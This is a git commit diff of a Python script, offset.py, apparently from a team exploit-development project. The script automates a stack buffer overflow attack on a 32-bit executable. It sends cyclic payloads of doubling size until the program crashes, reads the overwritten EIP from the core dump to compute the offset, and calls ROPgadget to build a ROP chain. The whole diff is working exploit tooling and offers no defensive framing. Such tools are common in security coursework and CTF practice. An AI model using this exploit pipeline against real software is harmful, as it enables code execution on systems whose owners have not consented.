Cat, argparse, payload sizes, more graceful errors

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
2020-11-25 16:17:36 +00:00 · 2020-11-25 16:17:36 +00:00 · 99cb451194
commit 99cb451194
parent 5f8099dde0
1 changed files with 49 additions and 21 deletions
--- a/offset.py
+++ b/offset.py
@ -1,41 +1,69 @@
 from pwnlib.elf.corefile import Coredump
 from pwnlib.util.cyclic import cyclic, cyclic_find
 from pwnlib.util.packing import pack
-from pwnlib.tubes.process import process
+from pwnlib.tubes.process import process, signal

 import os
 import subprocess
+import argparse
+import warnings
+import ROPgadget.ropgadget

-exec_name = "./vuln-32"
+print(r'''
+   _                ___       _.--.  ___        _____          ______ _____          ______ ______ 
+\`.|\..----...-'`   `-._.-'_.-'`    / _ \      / ____|   /\   |____  / ____|   /\   |  ____|  ____|
+/  ' `         ,       __.--'      | | | |_  _| |       /  \      / / |       /  \  | |__  | |__   
+)/' _/     \   `-_,   /            | | | \ \/ / |      / /\ \    / /| |      / /\ \ |  __| |  __|
+`-'" `"\_  ,_.-;_.-\_ ',           | |_| |>  <| |____ / ____ \  / / | |____ / ____ \| |    | |____ 
+    _.-'_./   {_.'   ; /            \___//_/\_\\_____/_/    \_\/_/   \_____/_/    \_\_|    |______|
+   {_.-``-'         {_/
+''')

-def find_offset(exec_name):
-    # TODO: command line arguments
+arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
+arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
+arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
+args = arg_parser.parse_args()
+
+exec_file = args.exec_file
+core_file = args.core
+
+def find_offset(exec_file, core_file):
    input_file = "input.txt"
-    core_file = "./core"

-    os.remove(core_file)
+    try:
+        os.remove(core_file)
+    except:
+        pass    
+    
+    payload_size = 32
+    while payload_size <= 16384:
+        print(f"[🤔] Trying payload {payload_size}...")

-    # TODO Loop until a crash, increase payload size each iteration
-    with open(input_file, "wb") as f:
-        payload = cyclic(512)
-        f.write(payload)
+        with open(input_file, "wb") as f:
+            payload = cyclic(payload_size)
+            f.write(payload)

-    process([exec_name, input_file]).wait()
+        process([f"./{exec_file}", input_file]).wait()

-    core = Coredump('./core')
+        try:
+            core = Coredump(f"./{core_file}")
+            
+            if core and pack(core.eip) in payload:
+                offset = cyclic_find(core.eip)
+                print(f"[😳] Found offset at {offset}!")
+                return offset
+        except FileNotFoundError:
+            pass

-    assert pack(core.eip) in payload
+        os.remove(input_file)
+        payload_size *= 2
+    
+    raise BaseException("Failed to find offset")

-    os.remove(input_file)

-    return cyclic_find(core.eip)
+offset = find_offset(exec_file, core_file)

-offset = find_offset(exec_name)
-
-# print("\t# Padding goes here") <-- search for this
-# print("\tp = ''\n")
-
-result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
+result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
 stdout = result.stdout